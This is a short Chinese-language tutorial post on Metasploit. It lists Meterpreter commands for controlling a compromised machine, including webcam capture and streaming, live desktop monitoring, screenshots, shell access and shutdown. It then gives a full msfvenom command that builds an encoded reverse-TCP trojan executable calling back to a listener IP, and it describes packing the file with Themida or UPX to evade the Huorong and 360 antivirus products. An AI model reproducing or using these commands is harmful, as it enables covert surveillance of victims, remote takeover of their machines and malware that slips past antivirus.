Meterpreter
在上一篇文章中我们得到了分别是windows的和linux的两个meterpreter,前面我们一直是在获取这么一个meterpreter,那么得到了meterpreter之后到底能够做什么呢。
#metasploit
back :退回
jobs :查看后台监听
jobs-k 1 :删除job 1
sessions :查看会话列表
sessions 1 :进入会话1
sessions-k 1 :删除会话1#metepreter
help: 查帮助信息
background:当前会话放到后台
exit:退出当前会话
webcam list:查看摄像头
webcam_snap:通过摄像头拍照
webcam_stream:通过摄像头开启视频
screenshot:获取屏幕截图
screenshare:实时监控桌面
shutdown:关闭目标机器
shell执行命令
例如我们使用screenshot:就获取到当前windows靶机上的一个屏幕截图。更多操作大家可以自己搭建虚拟机进行尝试
msfvenom bypass
bypass就是绕过的意思,如果没有bypass,你生成的东西默认都会被杀毒软件拦掉的。
#自带编码msfvenom -p windows/meterpreter/reverse_tcp Ihost=192.168.123.151 Iport=8888 -e shikata_ga_nai -i 3 -f exe -o demo2.exe
#加売
> upx 3.96
> Themida_v3.0.4.0
#查看msfvenom支持的编码:msfvenom -l encoders,可以查看你要使用的编码
我们举个例子,使用的是shikata_ga_nai编码,这个编码的等级属于excellent,也就是最好的自带编码,但是这个编码是支持的32位的payload,然后在编码方式后面要加上编码的次数-i 3,这里我们就给它编码三次。然后就会生成一个带有3次shikata_ga_nai的木马demo2.exe。那么现在这个demo2设否免杀了呢,当然不能免杀,这时候就会有疑问了,我们不是用了等级最高的编码方式了,为什么还是不能绕过杀毒软件。现在我们要知道我们学习的这些都是最最基础,也是最最简单的,你知道,火绒知不知道,360知不知道,它们也知道。那它们也知道了你的demo2还会免杀吗,就不会免杀了。
有没有方法让它免杀呢,最简单的方法就是给demo2加壳,可以使用Themida这个工具给我们的程序加壳,完成以后会生成一个demo2_protected.exe文件,这个文件可以绕过火绒的检测,但是360不行,因为360内置会检测Themida。或者是现在这个也不行了,也可以被检测出来,那我们还可以使用其他的方法进行操作,杀毒软件在一步步更新,我们免杀也是在不断的寻找其他方法。